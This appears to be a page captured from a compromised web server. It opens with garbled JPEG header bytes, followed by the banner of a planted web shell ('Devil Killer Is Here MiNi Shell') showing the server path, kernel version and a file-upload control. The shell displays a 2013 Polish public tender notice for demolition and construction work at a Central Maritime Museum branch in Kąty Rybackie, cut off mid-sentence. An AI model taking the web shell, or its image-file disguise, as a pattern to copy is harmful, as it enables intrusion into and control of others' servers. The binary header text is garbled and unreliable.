JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130716/277214-N-2013.html

<p class="kh_header"><b>Gdańsk: Zadanie: PRZYGOTOWANIE DOKUMENTACJI I REALIZACJA CZĘŚCI ZADANIA (ETAPU I INWESTYCJI) PT.: BUDOWA BUDYNKU MUZEALNEGO O FUNKCJI EKSPOZYCYJNEJ I MAGAZYNOWEJ CENTRALNEGO MUZEUM MORSKIEGO W GDAŃSKU - ODDZIAŁ: MUZEUM ZALEWU WIŚLANEGO W MIEJSCOWOŚCI KĄTY RYBACKIE UL. RYBACKA 64 wraz z robotami poprzedzającymi a polegającymi na rozbiórce istniejącego budynku magazynowego oraz wiaty, pod adresem: Kąty Rybackie ul. Rybacka 64; 82-110 Sztutowo; dz. nr 538 obręb ewidencyjny 02</b><br>
<b>Numer ogłoszenia: 277214 - 2013; data zamieszczenia: 16.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centralne Muzeum Morskie w Gdańsku , ul. Ołowianka 9-13, 80-751 Gdańsk, woj. pomorskie, tel. 058 3018611, faks 058 3018453.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cmm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie: PRZYGOTOWANIE DOKUMENTACJI I REALIZACJA CZĘŚCI ZADANIA (ETAPU I INWESTYCJI) PT.: BUDOWA BUDYNKU MUZEALNEGO O FUNKCJI EKSPOZYCYJNEJ I MAGAZYNOWEJ CENTRALNEGO MUZEUM MORSKIEGO W GDAŃSKU - ODDZIAŁ: MUZEUM ZALEWU WIŚLANEGO W MIEJSCOWOŚCI KĄTY RYBACKIE UL. RYBACKA 64 wraz z robotami poprzedzającymi a polegającymi na rozbiórce istniejącego budynku magazynowego oraz wiaty, pod adresem: Kąty Rybackie ul. Rybacka 64; 82-110 Sztutowo; dz. nr 538 obręb ewidencyjny 02.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie dotyczy: przygotowania kompletu dokumentacji projektowej i realizacji części robót stanowiących I etap inwestycji pt.: budowa budynku muzealnego o funkcji ekspozycyjnej i magazynowej Centralnego Muzeum Morskiego w Gdańsku - oddział Muzeum Zalewu Wiślanego w miejscowości Kąty Rybackie ul. Rybacka 64 wraz z robotami poprzedzającymi a polegającymi na rozbiórce istniejącego budynku magazynowego oraz wiaty, pod adresem: Kąty Rybackie ul. Rybacka 64; 82-110 Sztutowo; dz. nr 538 obręb ewidencyjny 02.
2.	Zakres prac objętych zamówieniem:
a.	dla określonego na planie (Załącznik nr 7) budynku pod numerem 1: magazynowego (szerokość 977 cm; długość: 3185 cm; wysokość: 468 cm; kubatura 1366 m3; powierzchnia zabudowy: 311 m2; ściany murowane z cegły; konstrukcja szkieletowa drewniana składająca się ze słupów i więźby dachowej w układzie płatwiowo kleszczowym; dach dwuspadowy o pełnym deskowaniu kryty papą; niepodpiwniczony) oraz budynku pod numerem 2: wiaty (szerokość: 889 cm; długość: 1991 cm; wysokość: 507 cm; kubatura: 801 m3; powierzchnia zabudowy: 176 m2; ściany z desek; konstrukcja szkieletowa stalowa składająca się z słupów z dwuteownika; dach dwuspadowy z jako konstrukcja kratownicowa, dwuspadowy kryty płytami falistymi z tworzywa sztucznego; niepodpiwniczony), opracowanie:
i.	szkicu usytuowania obiektu budowlanego, 
ii.	opisu zakresu i sposobu prowadzenia robót rozbiórkowych,
iii.	opisu sposobu zapewnienia bezpieczeństwa ludzi i mienia podczas prowadzenia robót rozbiórkowych,
iv.	pozyskanie pozwoleń, uzgodnień lub opinii innych organów, a także pozyskanie innych dokumentów, wymaganych przepisami prawa; 
v.	w imieniu Centralnego Muzeum Morskiego w Gdańsku, zgodnie z art. 31 ust. 2 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2003 r. Nr 207, poz. 2016 z późniejszymi zmianami) - zgłoszenie właściwemu organowi zamiaru rozpoczęcia robót rozbiórkowych na terenie nieruchomości,
vi.	wykonanie budowlanych robót rozbiórkowych przedmiotowych obiektów, oraz w wymaganym zakresie sieci uzbrojenia podziemnego,
vii.	wywóz i utylizacja na odpowiednio przystosowanym składowisku materiałów rozbiórkowych do rozebranym budynku oraz uporządkowanie terenu,
lub
viii.	opracowanie projektu budowlanego rozbiórki ww. obiektów (zakres i treść projektu budowlanego podlegają dostosowaniu do specyfiki i charakteru obiektu oraz stopnia skomplikowania robót budowlanych),
ix.	w imieniu Centralnego Muzeum Morskiego w Gdańsku złożenie do właściwego organu wniosku o pozwolenie na rozbiórkę oraz
x.	w imieniu Centralnego Muzeum Morskiego w Gdańsku uzyskanie od właściwego organu dla robót rozbiórkowych decyzji administracyjnej pozwalającej na rozbiórkę przedmiotowych obiektów, wraz z procedurą założenia i rejestracji dziennika budowy,
xi.	wykonanie budowlanych robót rozbiórkowych przedmiotowych obiektów, oraz w wymaganym zakresie sieci uzbrojenia podziemnego,
xii.	wywóz i utylizacja na odpowiednio przystosowanym składowisku materiałów rozbiórkowych do rozebranym budynku oraz uporządkowanie terenu,
b.	odpowiednio do opracowanej dokumentacji zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004 roku Nr 202 poz. 2072):
II.	RODZAJ OPRACOWANIA: PROGRAM FUNKCJONALNO - UŻYTKOWY; NAZWA ZAMÓWIENIA: BUDOWA BUDYNKU MUZEALNEGO O FUNKCJI EKSPOZYCYJNEJ I MAGAZYNOWEJ CENTRALNEGO MUZEUM MORSKIEGO W GDAŃSKU - ODDZIAŁ MUZEUM ZALEWU WIŚLANEGO W MIEJSCOWOŚCI KĄTY RYBACKIE UL. RYBACKA 64; (...) ADRES: UL. RYBACKA 64 KĄTY RYBACKIE; 82-110 SZTUTOWO; DZ. NR 538 OBRĘB EWIDENCYJNY 02 (...) (Załącznik nr 6),
wraz z jej integralnym elementem w postaci dokumentacji:
III.	OPRACOWANIE: PROJEKT KONCEPCYJNY; INWESTYCJA: BUDOWA BUDYNKU MUZEALNEGO O FUNKCJI EKSPOZYCYJNEJ I MAGAZYNOWEJ CENTRALNEGO MUZEUM MORSKIEGO W GDAŃSKU - ODDZIAŁ MUZEUM ZALEWU WIŚLANEGO W MIEJSCOWOŚCI KĄTY RYBACKIE, UL. RYBACKA 64; BRANŻA: ARCHITEKTURA, KONSTRUKCJA, BRANŻA ELEKTRYCZNA, TELETECHNICZNA, SANITARNA; ADRES INWESTYCJI: KĄTY RYBACKI, UL. RYBACKA 64; 82-110 SZTUTOWO DZIAŁKA NR 538 OBRĘB EWIDENCYJNY 02 (...): (Załącznik nr 8),
i.	opracowanie przez Wykonawcę dokumentacji wstępnej celem porównania, oceny i zatwierdzenia przez Zamawiającego pod kątem zgodności z ww. Programem funkcjonalno - użytkowym i Koncepcją, 
ii.	pozyskanie niezbędnych uzgodnień, opinii - stanowisk organów, instytucji, gestorów sieci i urządzeń oraz dostawców - odbiorców,
iii.	pozyskanie pozytywnych: opinii, uzgodnień, decyzji organów i instytucji, gestorów sieci i urządzeń oraz dostawców - odbiorców mediów,
iv.	opracowanie kompletnej dokumentacji projektowej: budowlanej i wykonawczej, kosztorysowej w postaci kalkulacji szczegółowej, specyfikacji technicznej wykonania i odbioru robót i innych opracowań a niezbędnych do uzyskania pozwolenia na budowę i realizacji całości zadania inwestycyjnego pod nazwą: budowa dla Centralnego Muzeum Morskiego w Gdańsku budynku muzealnego o funkcji ekspozycyjnej i magazynowej w miejscowości Kąty Rybackie- pod adresem: ul. Rybacka 64; 82-110 Sztutowo; dz. nr 538 obręb ewidencyjny 02,
Zakres i treść projektu budowlanego podlegają dostosowaniu do specyfiki i charakteru obiektu oraz  robót budowlanych,
c.	złożenie dokumentacji o której mowa w ww. punkcie 2.b.iv. Zamawiającemu celem jej weryfikacji i zajęcia w stosunku do rozwiązań w tej dokumentacji stanowiska  zgłoszenia ewentualnych uwag,
d.	akceptacja końcowa dokumentacji projektowej przez Zamawiającego, i przekazanie Zamawiającemu 1 kompletu dokumentacji przed rozpoczęciem robót,
e.w imieniu Centralnego Muzeum Morskiego w Gdańsku: złożenie do właściwego organu administracji architektoniczno budowlanej i nadzoru budowlanego wniosku o pozwolenie na budowę dla inwestycji polegającej na budowie budynku muzealnego o funkcji ekspozycyjnej i magazynowej,
f.w imieniu Centralnego Muzeum Morskiego w Gdańsku: uzyskanie decyzji administracyjnej pozwalającej na budowę inwestycji polegającej na budowie budynku muzealnego o funkcji ekspozycyjnej i magazynowej,
g.przekazanie Zamawiającemu dokumentacji projektowej: budowlanej i wykonawczej z pozwoleniem na budowę, kosztorysów, przedmiarów, specyfikacji technicznych wykonania i odbioru robót budowlanych,
h.wykonanie robót budowlanych objętych I etapem inwestycji:
i.rozbiórka budynku biurowo - magazynowego i wiaty magazynowej z wywozem i utylizacją materiałów rozbiórkowych,
ii.rozbiórka nawierzchni utwardzonej z płyt betonowych sześciokątnych Trylinka oraz krawężników i obrzeży  (płyty betonowe do powtórnego montażu),
iii.demontaż słupa oświetleniowego,
iv.wykonanie ogrodzenia stałego wzdłuż granicy zachodniej działki, z paneli ażurowych ( z siatki zgrzewanej,
v.wykonanie robót ziemnych (wykop, wywóz, utylizacja) przygotowawczych pod nowy budynek, zakładany do realizacji w etapie II,
vi.wykonanie robót ziemnych rozbiórkowych instalacji uzbrojenia podziemnego na działce, związanych z podlegającym rozbiórce obiektom oraz instalacji uzbrojenia podziemnego na działce a pozostającego w kolizji z projektowanymi instalacjami uzbrojenia podziemnego na działce w związku z podlegającym realizacji w etapie II inwestycji budynkiem,
vii.	wykonanie robót ziemnych uzbrojenia działki w instalacje zewnętrzne wymagane dla sprawnego funkcjonowania budynku zakładanego do realizacji w etapie II inwestycji, takie jak instalacja kanalizacji deszczowej, instalacja kanalizacji sanitarnej, instalacja wodociągowa, instalacja elektryczna, instalacja teletechniczna, 
viii.	wykonanie podbudowy pod budynek i  nawierzchnię terenu działki objętej przebudową, 
ix.przekazanie Zamawiającemu dokumentacji powykonawczej zrealizowanego etapu I inwestycji z elementami takimi jak  pomiary geodezyjne, protokoły badań i skuteczności prób, protokoły odbioru przyłączy i instalacji przez gestorów sieci, atesty, certyfikaty, deklaracje zgodności i inne wymagane dokumenty,  
UWAGA: 
1.lokalizacja inwestycji ma miejsce w obrębie Parku Krajobrazowego Mierzeja Wiślana, w którym obowiązuje Rozporządzenie Nr 56 06 Wojewody Pomorskiego z 15.05.2006 w sprawie ustalenia parku, z którego wynika m.in. zakaz realizacji przedsięwzięć mogących znacząco oddziaływać na środowisko. 
2.lokalizacja znajduje się w obrębie obszaru (Natura 2000) w której obowiązuje dyrektywa PLB 280010 - ostoja ptasia (Zalew Wiślany) i w obrębie obszaru (Natura 2000) w której obowiązuje dyrektywa PLH 280007 - (brak danych) Mierzeja Wiślana. Zgodnie z warunkami, zagospodarowanie terenu i użytkowanie nie może powodować pogorszenia stanu siedlisk przyrodniczych oraz siedlisk gatunków roślin i zwierząt, Tak więc należy przewidzieć możliwość wystąpienia obowiązku oceny oddziaływania przedsięwzięcia na środowisko albo oceny oddziaływania przedsięwzięcia na obszar Natura 2000,
3.lokalizacja znajduje się w obrębie tzw. strefy (B) ochrony konserwatorskiej, w którym obowiązują zasady ochrony dziedzictwa kulturowego i zabytków oraz dóbr kultury współczesnej. Projekty podlegają opinii WKZ w zakresie bryły, elewacji, obowiązuje konieczność dostosowania nowej zabudowy do zabudowy regionalnej i stosowanie tradycyjnych materiałów, 
4.lokalizacja znajduje się w obrębie portu morskiego, dla którego wymagane jest uzyskanie zwolnienia od zakazu zabudowy, o którym mowa w art. 88l ustawy Prawo wodne.  
5.lokalizacja znajduje się w obrębie  portu morskiego, gdzie obowiązuje wymóg stosowania rozwiązań zabezpieczających obiekty przed skutkami wzrostu poziomu wód gruntowych do plus1,25 m npm oraz przed powodzią morską do plus2,2 m npm, 
6.w miejscu inwestycji znajdują się niekorzystne warunki pod kątem poziomu wód gruntowych i nośności podłoża,.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp, stanowiących nie więcej niż  50 proc wartości zamówienia podstawowego i  polegających na powtórzeniu tego samego rodzaju zamówienia, zgodnego z przedmiotem zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.23.13-3, 71.22.00.00-6, 45.11.00.00-1, 45.11.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w przedmiotowym postępowaniu jest wymagane w wysokości 11.000,00 zł (słownie zł: jedenaście tysięcy  00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.	w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej a Zamawiający odebrał bez uwag  co najmniej 2 (dwie) roboty budowlane, o wartości nie mniejszej niż 370.000,00 zł netto każda, polegające na:
a.	robotach ogólnobudowlanych w skład których wchodziły roboty budowlane: prace rozbiórkowe budynków lub ich części lub budowa budynków nowych lub rozbudowa budynków istniejących wraz z wykopami ziemnymi i budową instalacji sieci uzbrojenia podziemnego, 
oraz
2.	w ciągu ostatnich 3  lat wykonał przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 (dwa) projekty budowlane i wykonawcze wielobranżowe o wartości nie mniejszej niż 60.000 zł netto każdy, gdzie komplet dokumentacji stanowiła dokumentacja składająca się z branż: 
a.	architektonicznej,
b.	konstrukcyjnej,
c.	instalacji sanitarnej, 
d.	elektrycznej, 
e.	elektrycznej - teletechnicznej teleinformatycznej,
f.	elektrycznej - teletechnicznej zabezpieczeń specjalistycznych budynków w instalacje SSWiN, CCTV, SAP, 
a także specyfikacji technicznych wykonania i odbioru robót, przedmiarów i kosztorysów sporządzonych w postaci kalkulacji szczegółowej co najmniej z wydzieleniem poszczególnych grup robót oraz wykazaniem ilości robót, materiału i sprzętu - w dowolnym programie kosztorysowym,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy osoby wykonującej projekt w zakresie branży architektonicznej: 
I.osoba posiadająca co najmniej 5 letnie doświadczenie w zakresie projektowania w branży architektonicznej i sporządzania projektów budowlanych, na podstawie których (zgłoszeniem lub decyzją organu administracji architektoniczno - budowlanej i nadzoru budowlanego) inwestor nabył prawo przystąpienia do realizacji inwestycji. Na potrzeby postępowania o zamówienie publiczne formą potwierdzającą wymagane doświadczenie stanowi rzeczowy wykaz dokumentacji określający: inwestora, przedmiot dokumentacji, określony w miesiącach czas wykonania dokumentacji - zgodnie z wzorem stanowiącym załącznik do zamówienia (Załącznik nr 3),
Po wyborze oferenta: w przypadku wątpliwości co do danych zawartych w tabeli jak w punkcie I, zamawiający zastrzega możliwość żądania przedłożenia od osoby składającej ww. wykaz - stosownych dokumentów na potwierdzenie stanu rzeczy opisanego w wykazie, 
II.posiada uprawnia budowlane do projektowania w specjalności architektonicznej bez ograniczeń i legitymuje się aktualnym   obowiązującym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego inżynierów,
2.Dotyczy projektowania w branży konstrukcyjnej:
I.osoba posiadająca co najmniej 5 letnie doświadczenie w zakresie projektowania w branży konstrukcyjnej i sporządzania projektów budowlanych, na podstawie których (zgłoszeniem lub decyzją organu administracji architektoniczno - budowlanej i nadzoru budowlanego) inwestor uzyskał prawo przystąpienia do realizacji inwestycji. Na potrzeby postępowania o zamówienie publiczne formą potwierdzającą wymagane doświadczenie stanowi rzeczowy wykaz dokumentacji określający: inwestora, przedmiot dokumentacji, określony w miesiącach czas wykonania dokumentacji - zgodnie z wzorem stanowiącym załącznik do zamówienia (Załącznik nr 3),
Po wyborze oferenta: w przypadku wątpliwości co do danych zawartych w tabeli jak w punkcie 1, zamawiający zastrzega możliwość żądania przedłożenia od osoby składającej ww. wykaz - stosownych dokumentów na potwierdzenie stanu rzeczy opisanego w wykazie, 
II.	 posiada uprawnia budowlane do projektowania w specjalności konstrukcyjnej, legitymuje się   aktualnym   obowiązującym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego inżynierów, 
3.	Dotyczy projektowania w branży sanitarnej:
I.	osoba posiadająca co najmniej 5 letnie doświadczenie w zakresie projektowania w branży sanitarnej - instalacji  wentylacji i systemów p.poż. oraz sporządzania projektów budowlanych, na podstawie których (zgłoszeniem lub decyzją organu administracji architektoniczno - budowlanej i nadzoru budowlanego) inwestor  uzyskał prawo przystąpienia do realizacji inwestycji. Na potrzeby postępowania o zamówienie publiczne formą potwierdzającą wymagane doświadczenie stanowi rzeczowy wykaz dokumentacji określający: inwestora, przedmiot dokumentacji, określony w miesiącach czas wykonania dokumentacji - zgodnie z wzorem stanowiącym załącznik do zamówienia (Załącznik nr 3),
Po wyborze oferenta: w przypadku wątpliwości co do danych zawartych w tabeli jak w punkcie I, zamawiający zastrzega możliwość żądania przedłożenia od osoby składającej ww. wykaz - stosownych dokumentów na potwierdzenie stanu rzeczy opisanego w wykazie,  
II.	posiada uprawnia budowlane do projektowania w specjalności sanitarnej bez ograniczeń, legitymuje się aktualnym , obowiązującym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego inżynierów,
4.	Dotyczy projektowania w branży elektrycznej :
I.	osoba posiadająca co najmniej 2 letnie doświadczenie w zakresie projektowania w branży elektrycznej i  sporządzania projektów budowlanych, na podstawie których (zgłoszeniem lub decyzją organu administracji architektoniczno - budowlanej i nadzoru budowlanego) inwestor nabył prawo przystąpienia do realizacji inwestycji. Na potrzeby postępowania o zamówienie publiczne formą potwierdzającą wymagane doświadczenie stanowi rzeczowy wykaz dokumentacji określający: inwestora, przedmiot dokumentacji, określony w miesiącach czas wykonania dokumentacji - zgodnie z wzorem stanowiącym załącznik do zamówienia (Załącznik nr 3),
Po wyborze oferenta: w przypadku wątpliwości co do danych zawartych w tabeli jak w punkcie I, zamawiający zastrzega możliwość żądania przedłożenia od osoby składającej ww. wykaz - stosownych dokumentów na potwierdzenie stanu rzeczy opisanego w wykazie, 
II.	posiada uprawnia budowlane do projektowania w specjalności elektrycznej, legitymuje się aktualnym obowiązującym zaświadczeniem o przynależności do właściwej izby samorządu zawodowego inżynierów,
5.	Dotyczy projektowania w branży elektrycznej - instalacje teletechniczne elektronicznych urządzeń i systemów alarmowych, sygnalizujących zagrożenie chronionych osób i mienia w obiekcie muzealnym (tzw. SAP, SSWiN i CCTV):
I.	osoba projektująca instalacje i urządzenia systemów zabezpieczenia technicznego budynku muzealnego,  spełnia wymagania § 12 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 1 grudnia 2008 r. w sprawie zabezpieczania zbiorów w muzeach przed pożarem, kradzieżą i innym niebezpieczeństwem grożącym zniszczeniem lub utrata zbiorów oraz sposobów przygotowania zbiorów do ewakuacji w razie powstania zagrożenia (Dz. U z 2008 roku Nr 229  Poz. 1528), tj. posiada zaświadczenie o ukończeniu specjalistycznego kursu z zakresu zabezpieczenia obiektów muzealnych, organizowanych przez Ośrodek Ochrony Zbiorów Publicznych (obecnie Narodowy Instytut Muzealnictwa i Ochrony Zbiorów - zarządzenie nr 6 Ministra Kultury i Dziedzictwa Narodowego z dnia 18.02.2011 w sprawie zmiany nazwy i zakresu działania Ośrodka Ochrony Zbiorów Publicznych, 
6.	Dotyczy kierowania robotami budowlanymi:  
I.	osoba  posiadająca uprawnienia budowlane do kierowania robotami w branży budowlanej bez ograniczeń, oraz
II.	posiada potwierdzone co najmniej  5 letnie doświadczenie w kierowaniu pracami budowlanymi po uzyskaniu tych uprawnień, oraz
III.	posiada aktualne i obowiązujące zaświadczenie o przynależności do właściwej izby samorządu zawodowego,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie warunkiem udziału w postępowaniu jest posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wysokości co najmniej 500 000, 00 zł ( pięćset tysięcy złotych);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał w sposób należyty oraz zgodnie z zasadami sztuki budowlanej a Zamawiający odebrał bez uwag  co najmniej 2 (dwie) roboty budowlane, o wartości nie mniejszej niż 370.000,00 zł netto każda, polegające na:
